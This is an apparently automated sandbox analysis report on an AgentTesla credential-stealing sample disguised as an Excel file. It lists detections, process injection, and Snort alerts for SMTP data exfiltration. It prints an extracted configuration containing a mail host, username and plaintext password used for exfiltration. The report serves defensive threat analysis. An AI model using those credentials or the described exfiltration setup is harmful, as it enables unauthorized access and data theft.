Edit tour

Windows Analysis Report
M_F+niestandardowy stempel.xlsx.exe

Overview

General Information

Sample name:	M_F+niestandardowy stempel.xlsx.exe
Analysis ID:	1430838
MD5:	32ff58faa9596522b0062f2692b0d96a
SHA1:	6b8206d5554c052e652b67af57b32ede5ceb5bd6
SHA256:	64da1a2af5fbbd35867312aa68bfedd2dc695cf8bdac16e6974237226ebb8cc0
Tags:	AgentTeslaexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Suspicious Double Extension File Execution

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

M_F+niestandardowy stempel.xlsx.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe" MD5: 32FF58FAA9596522B0062F2692B0D96A)

conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AddInProcess32.exe (PID: 2060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 5724 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

WerFault.exe (PID: 6804 cmdline: C:\Windows\system32\WerFault.exe -u -p 6696 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "webmail.zerotime.com.cy", "Username": "dvassis@zerotime.com.cy", "Password": "mbk627s320"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2886508442.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2886508442.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.2886508442.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2886508442.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: AddInProcess32.exe PID: 2060	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AddInProcess32.exe PID: 2060	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31709:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3177b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31805:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31897:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31901:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31973:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31a09:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a99:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
2.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33509:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3357b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33605:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33697:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33701:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33773:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33809:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33899:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31709:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3177b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31805:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31897:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31901:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31973:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31a09:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a99:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33509:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3357b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33605:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33697:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33701:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33773:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33809:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33899:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33509:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6df51:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3357b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6dfc3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33605:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e04d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33697:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e0df:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33701:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e149:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33773:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e1bb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33809:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e251:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33899:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e2e1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe", CommandLine: "C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe, NewProcessName: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6504, ProcessCommandLine: "C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe", ProcessId: 6696, ProcessName: M_F+niestandardowy stempel.xlsx.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 23.235.199.60, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Initiated: true, ProcessId: 2060, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733

Snort Signatures

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 23.235.199.60

Timestamp:	04/24/24-09:46:07.222431
SID:	2840032
Source Port:	49733
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 23.235.199.60

Timestamp:	04/24/24-09:46:07.222431
SID:	2851779
Source Port:	49733
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 23.235.199.60

Timestamp:	04/24/24-09:46:07.222364
SID:	2030171
Source Port:	49733
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 23.235.199.60

Timestamp:	04/24/24-09:46:07.222431
SID:	2855542
Source Port:	49733
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Exfil via SMTP - Source IP: 192.168.2.4 - Destination IP: 23.235.199.60

Timestamp:	04/24/24-09:46:07.222431
SID:	2855245
Source Port:	49733
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "webmail.zerotime.com.cy", "Username": "dvassis@zerotime.com.cy", "Password": "mbk627s320"}

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696, type: MEMORYSTR

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: M_F+niestandardowy stempel.xlsx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.pdb(` source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdbMZ source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.pdb- source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb`c source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WERA9A1.tmp.dmp.6.dr

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49733 -> 23.235.199.60:587
Source: Traffic	Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49733 -> 23.235.199.60:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49733 -> 23.235.199.60:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49733 -> 23.235.199.60:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49733 -> 23.235.199.60:587

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 23.235.199.60:587

Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: INMOTI-1US INMOTI-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 23.235.199.60:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: AddInProcess32.exe, 00000002.00000002.2886508442.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: AddInProcess32.exe, 00000002.00000002.2886508442.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://webmail.zerotime.com.cy
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000002.00000002.2886508442.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: AddInProcess32.exe, 00000002.00000002.2886508442.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: AddInProcess32.exe, 00000002.00000002.2886508442.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, NmHr1WHWKO.cs	.Net Code: FMeFrKvz
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack, NmHr1WHWKO.cs	.Net Code: FMeFrKvz

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B89EBF8	0_2_00007FFD9B89EBF8
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B8A9430	0_2_00007FFD9B8A9430
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B8AC3AD	0_2_00007FFD9B8AC3AD
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B894309	0_2_00007FFD9B894309
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B8929A1	0_2_00007FFD9B8929A1
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B8A6058	0_2_00007FFD9B8A6058
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B8A6050	0_2_00007FFD9B8A6050
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B8A1D88	0_2_00007FFD9B8A1D88
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B891DD8	0_2_00007FFD9B891DD8
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B89CE19	0_2_00007FFD9B89CE19
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B89246D	0_2_00007FFD9B89246D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F3E271	2_2_02F3E271
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F34A98	2_2_02F34A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F3D990	2_2_02F3D990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F33E80	2_2_02F33E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F341C8	2_2_02F341C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F3A958	2_2_02F3A958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690A178	2_2_0690A178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690BA00	2_2_0690BA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_069155A0	2_2_069155A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_069165E8	2_2_069165E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0691B228	2_2_0691B228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_06913050	2_2_06913050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0691C180	2_2_0691C180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_06917D78	2_2_06917D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_06917698	2_2_06917698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0691E3A0	2_2_0691E3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_06910040	2_2_06910040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_06915CDF	2_2_06915CDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_06910006	2_2_06910006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_06910580	2_2_06910580

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6696 -s 1076

Source: M_F+niestandardowy stempel.xlsx.exe

Static PE information: No import functions for PE file found

Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000000.1635108223.000001FE21582000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUruyalager> vs M_F+niestandardowy stempel.xlsx.exe
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename5052eb0c-ef87-4c36-aa75-8cdfdaca4381.exe4 vs M_F+niestandardowy stempel.xlsx.exe
Source: M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAmifebakayimejayF vs M_F+niestandardowy stempel.xlsx.exe
Source: M_F+niestandardowy stempel.xlsx.exe	Binary or memory string: OriginalFilenameUruyalager> vs M_F+niestandardowy stempel.xlsx.exe

Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: M_F+niestandardowy stempel.xlsx.exe, HasElementTypeMyVideos.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, ISZbPXDvPz.cs	Cryptographic APIs: 'TransformFinalBlock'
